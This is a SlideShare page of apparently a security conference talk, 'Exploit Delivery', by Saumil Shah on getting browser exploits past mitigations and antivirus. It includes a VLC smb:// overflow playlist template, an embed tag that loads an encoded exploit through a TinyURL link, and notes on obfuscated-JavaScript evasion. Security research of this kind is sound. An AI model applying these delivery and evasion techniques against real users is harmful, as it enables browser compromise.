Exploit Delivery

7,547 views

Published on

Published in: Technology
2 Comments
3 Likes
Statistics
Notes
No Downloads
Views
Total views
7,547
On SlideShare
0
From Embeds
0
Number of Embeds
75
Actions
Shares
0
Downloads
0
Comments
2
Likes
3
Embeds 0
No embeds

No notes for slide
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • Sandboxing isn't the solution.
  • Exploit Delivery

    1. net-square Hi! Your exploits have arrived.
    2. net-square # who am i • Saumil Shah, CEO Net-square • LinkedIn: saumilshah
    3. net-square The Web Has Evolved "The amount of intelligence in the world is constant. And the population is increasing."
    4. net-square Browser Wars Death of Standards HTTP +0.1 HTML?
    5. net-square THE WEB WE LIVE IN 5
    6. net-square 5 Wider Attack Surface
    7. net-square 5 Ease of Exploitation
    8. net-square 5 Mass Manufacturing
    9. net-square Complexity... 5
    10. net-square 5 A New Dimension!
    11. net-square Exploit Mitigation Techniques
    12. net-square /GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP
    13. net-square /GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP SEH overwrites non-SEH DLLs Return to LibC Heap Sprays ROP JIT Sprays
    14. net-square I can haz sandbox I Also Can!
    15. net-square IM IN UR BASE KILLING UR D00DZ Sploit Time!
    16. net-square See no EVAL CVE 2010-2883 (0+10) day exploit Obfuscated Javascript decoded without using eval, document.write, etc.
    17. net-square Who you gonna call?
    18. net-square howstuffworks - Anti Virus YER NOT ON THE LIST! COME ON IN.
    19. net-square howstuffworks - Anti Virus These are not the sploitz you're looking for.
    20. net-square 0-day to the Face! "To get our new signature files you need a valid support plan."
    21. net-square ...and keep on patching
    22. net-square Jedi Web Tricks Short.nr Clever JS Scripts without scripts HTML5
    23. net-square W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
    24. net-square We Broked Teh Webz! HTML Standards... What Standards? Object access JS too powerful SRC= HTTP Old and idiotic Stateless No Auth Bursty
    25. net-square Application Delivery The Web at present Authentication Statefulness Data Typing Non-mutable HTTP HTML AJAX Flash Sandbox HTML5 Anti-XSS WAF Silverlight Web sockets MIND THE GAP
    26. net-square Sploit Time!
    27. net-square smb:// mrl buffer overflow
    28. net-square VLC smb:// overflow - playlist <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist>
    29. net-square
    30. net-square Alpha Encoded Exploit Tiny URL ZOMFG
    31. net-square 100% Pure Alphanum!
    32. net-square VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> I'm in ur browser.... ...blowin up ur g00dz pwn
    33. net-square This iz what ?
    34. net-square I'm an evil Javascript I'm an innocent image
    35. net-square <CANVAS>
    36. net-square The Solution? HTML 8.0 HTTP 2.0 Browser Security Model Self Contained Apps
    37. net-square secure . automate . innovate www.net-square.com kthxbai

    ×